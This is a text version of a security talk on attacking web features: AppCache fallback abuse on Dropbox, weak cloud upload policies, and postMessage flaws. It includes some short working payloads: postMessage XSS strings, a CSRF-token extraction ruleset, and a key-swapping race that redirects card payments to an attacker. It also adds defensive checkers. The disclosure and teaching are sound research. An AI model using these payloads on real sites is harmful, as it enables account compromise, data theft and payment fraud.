Appsec Modern

The document discusses attacking modern web technologies. It begins with an introduction of the speaker, Frans Rosén, who is a security advisor and hacker. It then outlines topics to be covered: AppCache bugs in all browsers, weak upload policy implementations that can be bypassed, and exploiting vulnerabilities in postMessage implementations through tools and abusing sandboxed domains.


Attacking "Modern" Web Technologies
Frans Rosén @fransrosen

Modern = stuff people use

Frans Rosén
• "The Swedish Ninja"
• Security Advisor @detectify ( twitter: @fransrosen )
• HackerOne #7 @ /leaderboard/all-time
• Blog at labs.detectify.com
• Winner of MVH at H1-702 Live Hacking in Vegas!
• Winner Team Sweden in San Francisco (Oath)
• Best bug at H1-202 in Washington (Mapbox)
• Best bug at H1-3120 in Amsterdam (Dropbox)
Rundown
AppCache
• Bug in all browsers
Upload Policies
• Weak Implementations
• Bypassing business logic
Deep dive in postMessage implementations
• The postMessage-tracker extension (tool share!)
• Abusing sandboxed domains
• Leaks, extraction, client-side race conditions
AppCache – Not modern!

Disclaimer
Found independently by @filedescriptor, announced at last AppSecEU:
https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=22

AppCache

Cookie Stuffing/Bombing

Will make EVERY page return a 500 error = the manifest FALLBACK will be used

Bug in every browser


Manifest placed in /u/2241902/manifest.txt

Would use the FALLBACK for EVERYTHING, even outside the dir
Surprise – Specification was vague


"To mitigate this, manifests can only specify
fallbacks that are in the same path as the
manifest itself."
This was confusing: it could be read as the path of the fallback URL, and that is how browsers read it. They missed:
"Fallback namespaces must also be in the same path as the manifest's URL."

https://www.w3.org/TR/2015/WD-html51-20150506/browsers.html#concept-appcache-manifest-fallback

AppCache demo
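Added here as an illustration, not code from the talk: a small check for the rule the browsers missed, that both the FALLBACK entry and its namespace must sit under the manifest's own directory, run against a constructed manifest at the Dropbox path from the slides.

```javascript
// Added example (not from the talk): check the AppCache rule browsers got
// wrong. Both the fallback entry *and* the fallback namespace must be under
// the manifest's own directory. Manifest URL and contents are constructed.

// Directory of a URL: origin plus the path up to and including the last "/".
function manifestDirectory(manifestUrl) {
  const u = new URL(manifestUrl);
  return u.origin + u.pathname.slice(0, u.pathname.lastIndexOf('/') + 1);
}

// Parse a cache manifest and return its FALLBACK pairs.
function parseFallbacks(manifestText) {
  const lines = manifestText.split(/\r?\n/).map(l => l.trim());
  if (lines[0] !== 'CACHE MANIFEST') throw new Error('not a cache manifest');
  const fallbacks = [];
  let section = 'CACHE';
  for (const line of lines.slice(1)) {
    if (line === '' || line.startsWith('#')) continue;
    const m = line.match(/^(CACHE|NETWORK|FALLBACK|SETTINGS):$/);
    if (m) { section = m[1]; continue; }
    if (section !== 'FALLBACK') continue;
    const [namespace, entry] = line.split(/\s+/);
    if (!entry) continue; // malformed pair; browsers skip these too
    fallbacks.push({ namespace, entry });
  }
  return fallbacks;
}

// Returns one finding per out-of-scope URL; an empty array means the manifest
// can only take over its own directory, which is what the spec intends.
function checkFallbackScope(manifestUrl, manifestText) {
  const dir = manifestDirectory(manifestUrl);
  const findings = [];
  for (const { namespace, entry } of parseFallbacks(manifestText)) {
    // Resolve relative to the manifest URL, as a browser would.
    const ns = new URL(namespace, manifestUrl).href;
    const fb = new URL(entry, manifestUrl).href;
    if (!fb.startsWith(dir)) findings.push(`fallback entry ${fb} is outside ${dir}`);
    if (!ns.startsWith(dir)) findings.push(`fallback namespace ${ns} is outside ${dir}`);
  }
  return findings;
}

// The Dropbox case from the slides: a manifest in a user directory whose
// FALLBACK namespace is "/", i.e. every URL on the host (constructed text).
const DROPBOX_MANIFEST_URL = 'https://dl.dropboxusercontent.com/u/2241902/manifest.txt';
const ROOT_TAKEOVER_MANIFEST = [
  'CACHE MANIFEST',
  'FALLBACK:',
  '/ /u/2241902/fallback.html',
].join('\n');
```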
AppCache on Dropbox (bounty: $12,845)
• Could run XML on dl.dropboxusercontent.com as HTML
• XML installs manifest in browser on root
• Any file downloaded from Dropbox would use the fallback XML-HTML page, which would log the current URL to an external logging site
• Every secret link would be leaked to the attacker

Dropbox mitigations
• No more XML-HTML on dl.dropboxusercontent.com
• No more public directory for Dropbox users
• Coordinated bug reporting to every browser
• No more FALLBACK on root from path file
• Argued for faster deprecation of AppCache
• Random subdomains for user-files

Browser fixes: Chrome fixed, Edge/IE fixed, Firefox fixed, Safari fixed
Reported 28 Feb 2017, fixed ~June 2017
https://bugs.chromium.org/p/chromium/issues/detail?id=696806#c40

AppCache vulns still possible

Requirements:
• HTTPS only (was changed recently)
• Files uploaded can run HTML
• Files could be on an isolated sandboxed domain
• Files are uploaded to the same directory for all users

ServiceWorkers, big brother of AppCache

Requirements:
• HTTPS only
• Files uploaded can run HTML
• Files could be on an isolated sandboxed domain
• Files are uploaded to the root path
For example: bucket123.s3.amazonaws.com/test.html

Upload Policies
AWS and Google Cloud

Upload Policies
A way to upload files directly to a bucket, without passing the company's server first.

• Faster upload
• Secure (signed policy)
• Easy to do wrong!

Upload Policies
Looks like this (form screenshot on the slide); the policy is a signed, base64-encoded JSON document

Pitfalls AWS S3
• starts-with $key with an empty prefix (matches any key)
We can replace any file in the bucket!
• starts-with $key prefix does not contain a path separator
We can place stuff in the bucket root; remember ServiceWorkers/AppCache?
• $Content-Type uses an empty starts-with + content-disp
We can now upload HTML files:
Content-type: text/html
• $Content-Type uses starts-with = image/jpeg
We can still upload HTML, because the prefix match accepts:
Content-type: image/jpegz;text/html
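Added example, not from the talk or from AWS: a linter for a decoded S3 POST policy that flags exactly the pitfalls listed above (empty or root-level $key prefix, unconstrained or prefix-matched Content-Type); the policy document is constructed.

```javascript
// Added example (not from the talk or AWS): lint a decoded S3 POST policy for
// the pitfalls above. The policy document is constructed for illustration.
const samplePolicy = {
  expiration: '2030-01-01T00:00:00Z',
  conditions: [
    { bucket: 'example-bucket' },
    ['starts-with', '$key', ''],                       // any key, any path
    ['starts-with', '$Content-Type', 'image/jpeg'],    // prefix match only
    ['content-length-range', 0, 10485760],
  ],
};

// The form carries the policy base64-encoded; decode it the way S3 does.
function decodePolicy(base64Policy) {
  return JSON.parse(Buffer.from(base64Policy, 'base64').toString('utf8'));
}

// S3 evaluates starts-with as a plain prefix test on the submitted form value.
function startsWithAccepts(prefix, value) {
  return value.startsWith(prefix);
}

// Returns a list of weaknesses; an empty list means key and Content-Type are
// both pinned to exact values.
function lintPolicy(policy) {
  const findings = [];
  let keyPrefix = null, keyExact = null, ctPrefix = null, ctExact = null;
  for (const c of policy.conditions || []) {
    if (Array.isArray(c)) {
      if (c[0] !== 'starts-with') continue;            // e.g. content-length-range
      const field = String(c[1]).toLowerCase();
      if (field === '$key') keyPrefix = String(c[2]);
      if (field === '$content-type') ctPrefix = String(c[2]);
    } else if (c && typeof c === 'object') {
      for (const k of Object.keys(c)) {
        if (k === 'key') keyExact = c[k];
        if (k.toLowerCase() === 'content-type') ctExact = c[k];
      }
    }
  }
  if (keyExact === null) {
    if (keyPrefix === null) findings.push('no $key condition: any object can be written');
    else if (keyPrefix === '') findings.push('starts-with $key "": any object in the bucket can be overwritten');
    else if (!keyPrefix.includes('/')) findings.push(`$key prefix "${keyPrefix}" has no path separator: uploads land in the bucket root`);
  }
  if (ctExact === null) {
    if (ctPrefix === null || ctPrefix === '') findings.push('Content-Type unconstrained: text/html can be uploaded');
    else findings.push(`starts-with $Content-Type "${ctPrefix}": prefix match also accepts "${ctPrefix}z;text/html"`);
  }
  return findings;
}
```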
Custom business logic (Google Cloud)

POST /user_uploads/signed_url/ HTTP/1.1
Host: example.com
Content-Type: application/json;charset=UTF-8

{"file_name":"images/test.png","content_type":"image/png"}

Signed URL back to upload to:

{"signed_url":"https://storage.googleapis.com/uploads/images/test.png?Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."}

Vulnerabilities (total bounties: ~$15,000)
• We can select what file to override
• If signed URL allows viewing = read any file

POST /user_uploads/signed_url/ HTTP/1.1
Host: example.com
Content-Type: application/json;charset=UTF-8

{"file_name":"documents/invoice1.pdf","content_type":"application/pdf"}

{"signed_url":"https://storage.googleapis.com/uploads/documents/invoice1.pdf?Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."}

Just fetch the URL and we have the invoice

Rolling your own policy logic sucks

Custom Policy Logic

Goal is to reach the bucket-root, or another file

Path traversal with path normalization

Back to the 90s!

Full read access to every object + listing
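Added example, not the talk's code: one way to build the object key on the server for a signed-URL endpoint like the one above, so that the caller picks a file name but can reach neither the bucket root nor another user's file; the users/<id>/ prefix layout and the type allowlist are assumptions.

```javascript
// Added example (not the talk's code): build the object key for a signed-URL
// endpoint on the server side, so the caller can choose a file name but not
// the directory, the user prefix, or the content type. Prefix layout and the
// type allowlist are assumptions.
const ALLOWED_TYPES = { png: 'image/png', jpg: 'image/jpeg', jpeg: 'image/jpeg', pdf: 'application/pdf' };
const MAX_NAME = 200;

// Returns { key, contentType } or throws; userId comes from the session,
// never from the request body.
function objectKeyFor(userId, fileName) {
  if (typeof fileName !== 'string' || fileName.length === 0 || fileName.length > MAX_NAME) {
    throw new Error('bad file name');
  }
  // Decode once so "%2e%2e%2f" is judged the same way as "../".
  const decoded = decodeURIComponent(fileName);
  if (/[\\\u0000-\u001f]/.test(decoded) || decoded.startsWith('/')) throw new Error('bad file name');
  // Reject every form of traversal instead of normalising it away.
  const segments = decoded.split('/');
  if (segments.some(s => s === '' || s === '.' || s === '..')) throw new Error('traversal');
  // Content type is derived from the extension, not taken from the request.
  const m = /\.([a-z0-9]+)$/i.exec(segments[segments.length - 1]);
  const ext = m ? m[1].toLowerCase() : '';
  if (!Object.prototype.hasOwnProperty.call(ALLOWED_TYPES, ext)) throw new Error('type not allowed');
  // The prefix is fixed by the server; the client cannot escape it.
  const prefix = `users/${encodeURIComponent(String(userId))}/`;
  const key = prefix + decoded;
  if (!key.startsWith(prefix)) throw new Error('traversal'); // defensive re-check
  return { key, contentType: ALLOWED_TYPES[ext] };
}

// Boolean convenience for callers that only need accept/reject.
function isAcceptedFileName(userId, fileName) {
  try { objectKeyFor(userId, fileName); return true; } catch (e) { return false; }
}
```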


Regex extraction of URL-parts

Expected:
https://example-bucket.s3.amazonaws.com/dir/file.png

Result:
https://s3.amazonaws.com/example-bucket/dir/file.png?Signature..

Bypass: (shown as a screenshot on the slides)

Full read access to every object + listing

Temporary URLs with signed links

https://secure.example.com/files/xx11

Full read access to every object

Deep dive in postMessage

Birth of the postMessage-tracker extension

• 1 year ago, discussion on last AppSecEU!
• Catch every listener in all frames.
• Find the function receiving the message
• Log all messages between all frames

What have I found?

Regular vuln cases (XSS)

if (e.data.JSloadScript) {
  if (e.data.JSloadScript.type == "iframe") {
    // create the new iframe element with the src given to us via the event
    local_create_element(doc, ['iframe', 'width', '0', 'height', '0', 'src',
      e.data.JSloadScript.value], parent);
  } else {
    localLoadScript(e.data.JSloadScript.value)
  }
}

b.postMessage({"JSloadScript":{"value":"data:text/javascript,alert(document.domain)"}},'*')
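As an added example (not code from the talk or from the affected site), the same JSloadScript handler rewritten to check the sender's origin and the script URL before loading anything, with a stand-in loader so it runs outside a browser; ALLOWED_ORIGINS and SCRIPT_ORIGIN are assumed values.

```javascript
// Added example (not from the talk): the JSloadScript handler with the two
// checks the original lacks. The loader is injected so the decision logic can
// be exercised in Node; ALLOWED_ORIGINS and SCRIPT_ORIGIN are assumptions.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);
const SCRIPT_ORIGIN = 'https://static.example.com';

// Only absolute https URLs on the expected static origin. This rejects data:,
// javascript: and blob: URLs as well as any attacker-controlled host.
function isAllowedScriptUrl(value) {
  let u;
  try { u = new URL(String(value)); } catch (e) { return false; }
  return u.protocol === 'https:' && u.origin === SCRIPT_ORIGIN;
}

// Returns what the handler decided and why, so it can be tested without a
// browser. `load(kind, url)` stands in for localLoadScript / iframe creation.
function handleMessage(e, load) {
  if (!ALLOWED_ORIGINS.has(e.origin)) return { action: 'ignored', reason: 'origin' };
  const req = e.data && e.data.JSloadScript;
  if (!req || typeof req !== 'object') return { action: 'ignored', reason: 'shape' };
  if (!isAllowedScriptUrl(req.value)) return { action: 'ignored', reason: 'url' };
  const kind = req.type === 'iframe' ? 'iframe' : 'script';
  load(kind, req.value);
  return { action: 'loaded', kind, url: req.value };
}
```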
What have I found?

Complex ones: Data-Extraction

Data-Extraction
Walked through on the slides as screenshots: the listener, the vulnerable origin-check, "looks harmless?", initiating the ruleset, the action-rules, and the extraction-options.

Trigger:
{
  "params": {
    "testRules": {
      "rules": [
        {
          "name": "xxx",
          "triggers": {
            "type": "Delay",
            "delay": 5000
          }
          ...
        }
      ]
    }
  }
}

State:
...
"states": {
  "type": "JSVariableExists",
  "name": "ClickTaleCookieDomain",
  "value": "example.com"
},
...

Action:
...
"action": {
  "actualType": "CTEventAction",
  "type": "TestRuleEvent",
  "dynamicEventName": {
    "parts": [
      {
        "type": "ElementValue",
        "ctSelector": {
          "querySelector": ".content-wrapper script"
        }
      },
      {
        "type": "CookieValue",
        "name": "csrf_token"
      }
    ]
  }
}

Payload: (screenshot on the slide)

CSRF-token!

XSS on isolated but "trusted" domain

Sandboxed domain being trusted and not trusted at the same time.
postMessage used to transfer data from/to trusted domain.

Scenario (diagrams on the slides: ACME.COM document service, usersandbox.com as the sandboxed domain):
• Document service on ACME.COM: "Create new doc"
• XSS on the sandbox, usersandbox.com
• User creates a document
• Sandbox opens up in an iframe for the doc-converter
• Hijack the iframe JS, due to SOP (the attacker's XSS on usersandbox.com runs same-origin with the converter iframe)
• User uploads file, postMessage data to converter
• Iframe leaks data to attacker's sandbox window
• And we have the document-data!

What have I found?

Client-side Race Conditions!

Localized welcome screen, JS loaded w/ postMsg
(Diagram on the slides: the page first shows "Loading…", then the localized greeting "Welcome!" / "Välkommen!" / "Willkommen!" once the locale JS from localeservice.com has loaded; labels on the diagram: mpel.com, localeservice.com, link.com.example.com = OK)

Only works once

curr not escaped

Loaded JS, osl vuln param

...&curr=&osl='-alert(1)-'

alert was blocked. yawn… easy fix

Attacker-site: link.com.example.com
Attacker site opens victim site ("Loading…")
Loaded JS (loads mpel.js...):

setInterval(function() {
  if(b) b.postMessage('{"sitelist":"www.example.com/global","siteurl":"www.example.com/uk","curr":"curr=&osl=\'-(function(){document.body.appendChild(iframe=document.createElement(\'iframe\'));window.alert=iframe.contentWindow[\'alert\'];document.body.removeChild(iframe);window.alert(document.domain)})()-\'"}','*')
}, 10);

We won!

Client-Side Race Condition

postMessage between JS-load and iframe-load
Worked in all browsers.

Client-Side Race Condition #2


Multiple bugs incoming, hang on!
Can you find the bug(s)?

SecureCreditCardController.prototype.isValidOrigin = function (origin) {
  if (origin === null || origin === undefined) {
    return false;
  }
  var domains = [".example.com", ".example.to", ".example.at", ".example.ca",
    ".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie",
    ".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi",
    ".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp",
    ".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph",
    ".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr",
    ".example.com.hk", ".example.com.tw"];
  var escapedDomains = $.map(domains, function (domain) {
    return domain.replace('.', '\\.');
  });
  var exampleDomainsRE = '^https:\/\/.*(' + escapedDomains.join('|') + ')$';
  return Boolean(origin.match(exampleDomainsRE));
};

1st bug!
".example.co.nz".replace('.', '\\.')

"\.example.co.nz"

String.prototype.replace with a string pattern only replaces the first occurrence, so every dot after the first stays an unescaped regex wildcard.

2nd bug!
.nz is allowed since 2015 (names registered directly under .nz)!
https://en.wikipedia.org/wiki/.nz

Boolean("https://www.exampleaco.nz".match('^https:\/\/.*(\.example.co.nz)$'))

true
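Added example (not the vendor's fix): isValidOrigin with both bugs closed, escaping every dot and comparing the parsed hostname against the suffix list rather than running a regex over the whole origin string, checked against the exampleaco.nz origin from the slides; the suffix list is shortened.

```javascript
// Added example (not the talk's or the vendor's fix): isValidOrigin rewritten
// so that (1) every dot in the allowed suffixes is escaped and (2) the check
// is done on the parsed hostname, anchored at a label boundary. The suffix
// list is shortened from the slide.
const TRUSTED_SUFFIXES = ['.example.com', '.example.co.nz', '.example.co.uk'];

// Compare hostnames, not a regex over the whole origin string.
function isValidOrigin(origin) {
  if (typeof origin !== 'string') return false;
  let u;
  try { u = new URL(origin); } catch (e) { return false; } // also rejects "null"
  if (u.protocol !== 'https:') return false;
  // A real origin carries no credentials and (here) no non-default port.
  if (u.username || u.password || u.port) return false;
  const host = u.hostname.toLowerCase();
  // Either the apex itself ("example.com") or a label under it (".example.com").
  return TRUSTED_SUFFIXES.some(s => host === s.slice(1) || host.endsWith(s));
}

// The regex-based variant kept for comparison, with a global escape of all
// regex metacharacters and a hostname character class instead of ".*".
function isValidOriginRegex(origin) {
  if (typeof origin !== 'string') return false;
  const escaped = TRUSTED_SUFFIXES.map(d => d.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'));
  const re = new RegExp('^https://[a-z0-9.-]+(' + escaped.join('|') + ')$', 'i');
  return re.test(origin);
}
```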
Vulnerable scenario

(Diagrams on the slides: ilikefood.com with a "Subscribe!" button, which opens the PCI-certified payment domain foodpayments.com in an iframe.)

• Opens PCI-certified domain for payment
• Iframe loaded, main frame sends INIT to iframe:
iframe.postMessage('INIT', '*')
• Iframe registers the sender of INIT as msgTarget:
if(e.data==INIT && originOK) {
  msgTarget = event.source
  msgTarget.postMessage('INIT','*')
}
• Iframe tells main all is OK:
if(e.data==INIT and e.source==iframe) {
  all_ok_dont_kill_frame()
}
• Main window sends over provider data:
if(INIT) {
  iframe.postMessage('["LOAD","stripe","pk_abc123"]', '*')
}
• Iframe loads payment provider and kills channel:
if(INIT) {
  if(e.data[0]==LOAD && originOK) {
    initpayment(e.data[1], e.data[2])
    window.removeEventListener('message', listener)
  }
}

Did you see it?

• Open ilikefood.com from attacker (exampleaco.nz)
• Victim clicks subscribe, iframe is loaded
• Attacker sprays out LOAD to iframe:
setInterval(function(){
  child.frames[0].postMessage('["LOAD","stripe","pk_diffkey"]','*')
}, 100)
• INIT-dance resolves ('INIT'<->'INIT'), but attacker wins with LOAD
• LOAD kills listener, we won the race! Stripe loads… the frame loads api.stripe.com?key=pk_diffkey…
• It's now the attacker's Stripe account: victim enters credit card and pays
• Payment will fail for site… but worked for Stripe!
• From Stripe-logs we can charge the card anything!

Client-Side Race Condition #2

postMessage from opener between two other postMessage-calls
Chrome seems to be the only one allowing this to happen afaik.
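Added example (not the talk's or the payment provider's code): the iframe's listener in its vulnerable and hardened forms, driven by the message order from the slides so the race is reproducible without a browser; origins, keys and the broken origin check are constructed stand-ins.

```javascript
// Added example (not from the talk): the payment iframe's message listener,
// vulnerable and hardened, driven by a constructed sequence of messages in
// the order the race produced them. Origins, keys and the origin check are
// stand-ins. Window objects are plain objects so e.source can be compared.
const MAIN = { id: 'ilikefood.com', origin: 'https://ilikefood.com' };
const ATTACKER = { id: 'exampleaco.nz', origin: 'https://www.exampleaco.nz' };

// The listener as the slides describe it: LOAD is accepted from *any* window
// once INIT has been seen, and originOK is the broken regex check.
function vulnerableIframe(originOK) {
  let msgTarget = null, initialised = false, provider = null;
  function listener(e) {
    if (provider !== null) return;                       // listener was removed
    if (e.data === 'INIT' && originOK(e.origin)) { msgTarget = e.source; initialised = true; return; }
    if (initialised && e.data[0] === 'LOAD' && originOK(e.origin)) {
      provider = { name: e.data[1], key: e.data[2], from: e.source.id };
    }
  }
  return { listener, result: () => provider };
}

// Hardened: exact origin comparison, and LOAD only from the window that sent
// INIT, identified by e.source, which another window cannot forge.
function hardenedIframe(allowedOrigin) {
  let msgTarget = null, provider = null;
  function listener(e) {
    if (provider !== null || e.origin !== allowedOrigin) return;
    if (e.data === 'INIT') { msgTarget = e.source; return; }
    if (msgTarget !== null && e.source === msgTarget && e.data[0] === 'LOAD') {
      provider = { name: e.data[1], key: e.data[2], from: e.source.id };
    }
  }
  return { listener, result: () => provider };
}

// Message order from the slides: the INIT handshake resolves, then the
// attacker's sprayed LOAD lands before the main window's own LOAD.
const RACE = [
  { source: MAIN, origin: MAIN.origin, data: 'INIT' },
  { source: ATTACKER, origin: ATTACKER.origin, data: ['LOAD', 'stripe', 'pk_diffkey'] },
  { source: MAIN, origin: MAIN.origin, data: ['LOAD', 'stripe', 'pk_abc123'] },
];

// Deliver messages in order and report which provider key the frame loaded.
function run(frame, messages) {
  for (const m of messages) frame.listener(m);
  return frame.result();
}

// Stand-in for the talk's single-escaped regex, which lets exampleaco.nz through.
const brokenOriginOK = o => o === MAIN.origin || /^https:\/\/.*(\.example.co.nz)$/.test(o);
```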
postMessage-tracker Speedbumps
• Problem 1: Function-wrapping (Raven.js, rollbar, bugsnag, NewRelic). Before/after shown on the slides.
Solution: Find wrapper and jump over it. console better due to this!
• Problem 2: jQuery-wrapping, such a mess (differs between versions). Before/after shown on the slides.
Solution: Use either ._data, .expando or .events from jQuery object!
• Problem 3: Anonymous functions. Could not identify them at all. Before/after shown on the slides.
Solution: Can't extract using Function.toString() in Chrome :(
Will however at least show them as tracked now

postMessage-tracker released?
No :( I suck. "Soon"?
Want to complete more features!
• Trigger debugger to breakpoint messages (since we own the order)
• Try to see if .origin is being used and how
• If regex, run through Rex!

That's it!

Frans Rosén (@fransrosen)